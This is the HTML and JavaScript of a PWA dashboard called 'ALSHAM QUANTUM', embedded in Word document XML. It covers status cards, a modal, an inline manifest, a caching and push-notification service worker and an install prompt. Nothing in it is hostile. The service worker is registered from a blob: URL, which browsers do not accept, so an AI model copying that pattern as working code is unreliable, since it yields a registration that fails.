    <w:p w14:paraId="137801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&lt;h3 class="text-lg md:text-xl font-bold mb-4 flex items-center"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDE92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&lt;i class="fas fa-stream mr-2" style="color: var(--accent-secondary);" aria-hidden="true"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9995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Enterprise Event Stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451A2C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&lt;span class="ml-2 px-2 py-1 text-xs rounded-full bg-red-500 animate-pulse"&gt;LIVE&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181D63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&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8CBA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class="event-log" id="event-log" role="log" aria-live="polite"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DC8B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class="text-center opacity-75 py-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED08D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&lt;i class="fas fa-satellite-dish text-2xl md:text-3xl mb-2" aria-hidden="true"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DAF8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&lt;p&gt;Connecting to neural network...&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688AD2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30CB1D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7B2649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06E71B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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B13B036" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D5BE7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System Health Section --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C82D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class="glass-card p-4 md:p-6 mb-8" role="region" aria-label="Saúde do Sistema"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F775F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&lt;h3 class="text-lg md:text-xl font-bold mb-4 flex items-center"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A77E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&lt;i class="fas fa-heartbeat mr-2" style="color: var(--accent-primary);" aria-hidden="true"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B1D2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Enterprise System Health</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE6A8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&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EAD5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class="grid grid-cols-1 md:grid-cols-3 gap-4"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702092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class="text-center p-4 glass-card"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C992E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class="text-2xl mb-2"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>💾</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B96C3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class="font-semibold"&gt;Memory&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DF45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class="text-lg font-bold orbitron" id="memory-usage" aria-live="polite"&gt;64%&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7C3F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028A3B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class="text-center p-4 glass-card"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1B1B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class="text-2xl mb-2"&gt;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>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EB01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class="font-semibold"&gt;Processing&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B0C1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class="text-lg font-bold orbitron" id="cpu-usage" aria-live="polite"&gt;42%&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1802B4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3AD3CE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class="text-center p-4 glass-card"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A941E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class="text-2xl mb-2"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🌐</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F554C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class="font-semibold"&gt;Network&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1666B8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class="text-lg font-bold orbitron" id="network-status" aria-live="polite"&gt;OPTIMAL&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC5D8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2A1147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73EF09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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3458D7F1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F610E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Footer --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59815E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&lt;footer class="text-center mt-12 mb-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5307F6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class="glass-card p-4 md:p-6"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738DAD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&lt;p class="text-base md:text-lg font-semibold mb-2"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🏢</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ENTERPRISE EXCELLENCE&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D522C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&lt;p class="text-lg md:text-xl italic" style="color: var(--accent-primary);"&gt;"Transforming Commerce Through Quantum Intelligence"&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7486E0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&lt;p class="text-xs md:text-sm opacity-75 mt-4"&gt;ALSHAM QUANTUM - Advanced Neural Platform for Global Commerce Leadership&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7551EC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class="mt-4 text-xs opacity-50"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E989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&lt;p&gt;Enterprise PWA Edition | Quantum-Optimized Performance | Powered by ALSHAM GLOBAL COMMERCE&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3446AF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16B5E3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5AED5E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&lt;/footer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5927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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A53BA3D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="791C9E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Modals --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F229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&lt;div id="agent-modal" class="modal" role="dialog" aria-labelledby="modal-title" aria-hidden="true"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A205D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class="modal-content"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BB95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class="flex justify-between items-center mb-6"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657598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&lt;h2 class="text-xl md:text-2xl font-bold orbitron" id="modal-title"&gt;Neural Agent Details&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B672F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&lt;button onclick="closeModal()" class="text-2xl hover:text-red-400 transition-colors" aria-label="Fechar modal"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7085D2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&lt;i class="fas fa-times"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F9C5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&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0107C1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21A0F5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id="modal-body"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3700FB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&lt;!-- Modal content will be populated by JavaScript --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCAC0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6C4829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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2767FB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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B33BCAA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AD9B3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Micro Update Popup --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD1BF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&lt;div id="micro-update" class="micro-update" role="alert" aria-live="assertive"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AB15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&lt;i class="fas fa-plus mr-2"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6B08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Neural cycle completed!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681EE1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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C7AFB0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EABAF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PWA Manifest (Inline) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6973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&lt;script id="pwa-manifest" type="application/json"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577473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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297CA3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"name": "ALSHAM QUANTUM - Enterprise Neural Platform",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8D68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"short_name": "ALSHAM QUANTUM",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DD2E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"description": "Advanced Quantum-Powered Neural Platform for Enterprise Commerce Intelligence",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54457A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"start_url": "./",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0879E5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"display": "standalone",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4759FD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"background_color": "#1a1a2e",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62642D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"theme_color": "#F4D03F",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38357F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"orientation": "portrait-primary",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7756F7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"scope": "./",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E60C5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"lang": "pt-BR",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417969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"categories": ["business", "productivity", "utilities", "finance"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BEF9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"icons": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E86BE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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724376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"src": "data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 192 192'%3E%3Cdefs%3E%3ClinearGradient id='grad' x1='0%25' y1='0%25' x2='100%25' y2='100%25'%3E%3Cstop offset='0%25' style='stop-color:%23F4D03F;stop-opacity:1' /%3E%3Cstop offset='100%25' style='stop-color:%236C3483;stop-opacity:1' /%3E%3C/linearGradient%3E%3C/defs%3E%3Crect width='192' height='192' fill='url(%23grad)' rx='20'/%3E%3Ctext x='96' y='110' font-family='Orbitron' font-size='28' font-weight='bold' text-anchor='middle' fill='white'%3EQUANTUM%3C/text%3E%3Ccircle cx='96' cy='60' r='20' fill='white' opacity='0.8'/%3E%3C/svg%3E",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211E05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"sizes": "192x192",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BD02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"type": "image/svg+xml",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492171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"purpose": "any"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23084A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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102747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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF14D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"src": "data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 512 512'%3E%3Cdefs%3E%3ClinearGradient id='grad' x1='0%25' y1='0%25' x2='100%25' y2='100%25'%3E%3Cstop offset='0%25' style='stop-color:%23F4D03F;stop-opacity:1' /%3E%3Cstop offset='100%25' style='stop-color:%236C3483;stop-opacity:1' /%3E%3C/linearGradient%3E%3C/defs%3E%3Crect width='512' height='512' fill='url(%23grad)' rx='50'/%3E%3Ctext x='256' y='320' font-family='Orbitron' font-size='72' font-weight='bold' text-anchor='middle' fill='white'%3EQUANTUM%3C/text%3E%3Ccircle cx='256' cy='180' r='60' fill='white' opacity='0.8'/%3E%3C/svg%3E",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D383B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"sizes": "512x512",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3155B9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"type": "image/svg+xml",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C408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"purpose": "any maskable"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B877C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7CF98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],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522077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"shortcuts": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4284A1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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753BC6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"name": "Neural Dashboard",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114CA6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"url": "./?shortcut=dashboard",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448A52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"description": "Access main neural dashboard",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0991B1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"icons": [{"src": "data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24' fill='%23F4D03F'%3E%3Cpath d='M3 13h8V3H3v10zm0 8h8v-6H3v6zm10 0h8V11h-8v10zm0-18v6h8V3h-8z'/%3E%3C/svg%3E", "sizes": "96x96", "type": "image/svg+xml"}]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354123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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0163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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135061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"name": "Agent Metrics",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC401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"url": "./?shortcut=agents",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338B04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"description": "View neural agent performance",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772D9C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"icons": [{"src": "data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24' fill='%239333EA'%3E%3Cpath d='M20,4C21.11,4 22,4.89 22,6V18C22,19.11 21.11,20 20,20H4C2.89,20 2,19.11 2,18V6C2,4.89 2.89,4 4,4H20M20,18V6H4V18H20Z'/%3E%3C/svg%3E", "sizes": "96x96", "type": "image/svg+xml"}]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD50C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748C8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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4723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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2549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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0384B0F3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="148509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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC0FE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PWA SERVICE WORKER REGISTRATION =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF204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('serviceWorker' in navigator) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB57C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window.addEventListener('load', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6AB6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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D9BE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swCode = `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606626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CACHE_NAME = 'alsham-quantum-v2.0.0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EC55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CACHE_URLS = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA946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'./',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0E21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'https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081F95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'https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.4.0/css/all.min.css',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC3DB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'https://fonts.googleapis.com/css2?family=Orbitron:wght@400;700;900&amp;family=Inter:wght@300;400;500;600;700&amp;display=swap',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACB96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'https://cdn.jsdelivr.net/npm/chart.js',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F54EA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'https://cdnjs.cloudflare.com/ajax/libs/gsap/3.12.2/gsap.min.js',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AFFD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'https://cdn.jsdelivr.net/npm/three@0.158.0/build/three.min.js',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AF33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'https://cdn.jsdelivr.net/npm/countup.js@2.6.2/dist/countUp.umd.js'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6963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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2A27E0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F4894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self.addEventListener('install', (event) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7570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event.waitUntil(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6E95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caches.open(CACHE_NAME)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6FCD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.then((cache) =&gt; cache.addAll(CACHE_URLS))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3A23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.then(() =&gt; self.skipWaiting())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445DB7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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4CF7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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BD3297" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="564ABF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self.addEventListener('activate', (event) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CADA3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event.waitUntil(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6703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caches.keys().then((cacheNames) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ECEC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return Promise.all(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A38ED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    cacheNames.map((cacheName) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150581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        if (cacheName !== CACHE_NAME) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4C49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            return caches.delete(cacheName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA5C4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        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7329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    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231C19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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080E0A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}).then(() =&gt; self.clients.claim())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAED7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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578F84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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D17127" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78EEC0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self.addEventListener('fetch', (event) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A507F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if (event.request.url.includes('/ws')) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D319D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738149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event.respondWith(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F536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fetch(event.request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774A5A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.then((response) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A829A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    if (response &amp;&amp; response.status === 200) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F725C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        const responseToCache = response.clone();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615D9C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        caches.open(CACHE_NAME)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3878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            .then((cache) =&gt; cache.put(event.request, responseToCache));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146A7E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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5483DE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    return response;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F6D5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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556D4E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.catch(() =&gt; caches.match(event.request))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7446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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C8CD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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4287CD87" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EE47F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self.addEventListener('push', (event) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0781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const options = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF00A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body: event.data ? event.data.text() : 'Nova atualização no ALSHAM QUANTUM',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBD6A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icon: 'data:image/svg+xml,&lt;svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 192 192"&gt;&lt;defs&gt;&lt;linearGradient id="grad" x1="0%" y1="0%" x2="100%" y2="100%"&gt;&lt;stop offset="0%" style="stop-color:#F4D03F;stop-opacity:1" /&gt;&lt;stop offset="100%" style="stop-color:#6C3483;stop-opacity:1" /&gt;&lt;/linearGradient&gt;&lt;/defs&gt;&lt;rect width="192" height="192" fill="url(#grad)" rx="20"/&gt;&lt;text x="96" y="110" font-family="Orbitron" font-size="28" font-weight="bold" text-anchor="middle" fill="white"&gt;QUANTUM&lt;/text&gt;&lt;circle cx="96" cy="60" r="20" fill="white" opacity="0.8"/&gt;&lt;/svg&gt;',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B0BC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badge: 'data:image/svg+xml,&lt;svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 72 72"&gt;&lt;circle cx="36" cy="36" r="36" fill="#F4D03F"/&gt;&lt;text x="36" y="45" font-family="Orbitron" font-size="18" font-weight="bold" text-anchor="middle" fill="white"&gt;Q&lt;/text&gt;&lt;/svg&gt;',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4684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vibrate: [200, 100, 200],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0867E8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tag: 'quantum-notification',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156077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requireInteraction: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CFF0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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344622B7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01AEA0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event.waitUntil(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233DBB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self.registration.showNotification('ALSHAM QUANTUM', options)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12614F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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3B43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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E954A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`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105689BB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62EE7D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swBlob = new Blob([swCode], { type: 'application/javascript' });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726034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swUrl = URL.createObjectURL(swBlob);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD36D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registration = await navigator.serviceWorker.register(swUrl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0C8A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05259D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console.log('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ALSHAM QUANTUM Service Worker registrado:', registration.scope);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1DF7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0BAD79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('Notification' in window &amp;&amp; Notification.permission === 'default') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192337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await Notification.requestPermission();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7714F1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797091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6E977A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catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443092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console.error('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ao registrar Service Worker:', error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167677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59D015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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED74E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4FA28B1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BF7DA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WEB APP MANIFEST INJECTION =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7517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window.addEventListener('DOMContentLoaded', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D02A1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manifestJson = document.getElementById('pwa-manifest').textContent;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1901FE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manifestBlob = new Blob([manifestJson], { type: 'application/json' });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8406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manifestUrl = URL.createObjectURL(manifestBlob);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700075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CAF90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manifestLink = document.createElement('link');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56537E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manifestLink.rel = 'manifest';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C275B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manifestLink.href = manifestUrl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE351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document.head.appendChild(manifestLink);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C70D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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A667EFF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2922E2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PWA INSTALL PROMPT =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4863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let deferredPrompt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062F21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92D4B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window.addEventListener('beforeinstallprompt', (e) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B2E4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e.preventDefault();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF49E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deferredPrompt = e;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296F72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document.getElementById('install-prompt').classList.add('show');</w:t>
      </w:r>
    </w:p>
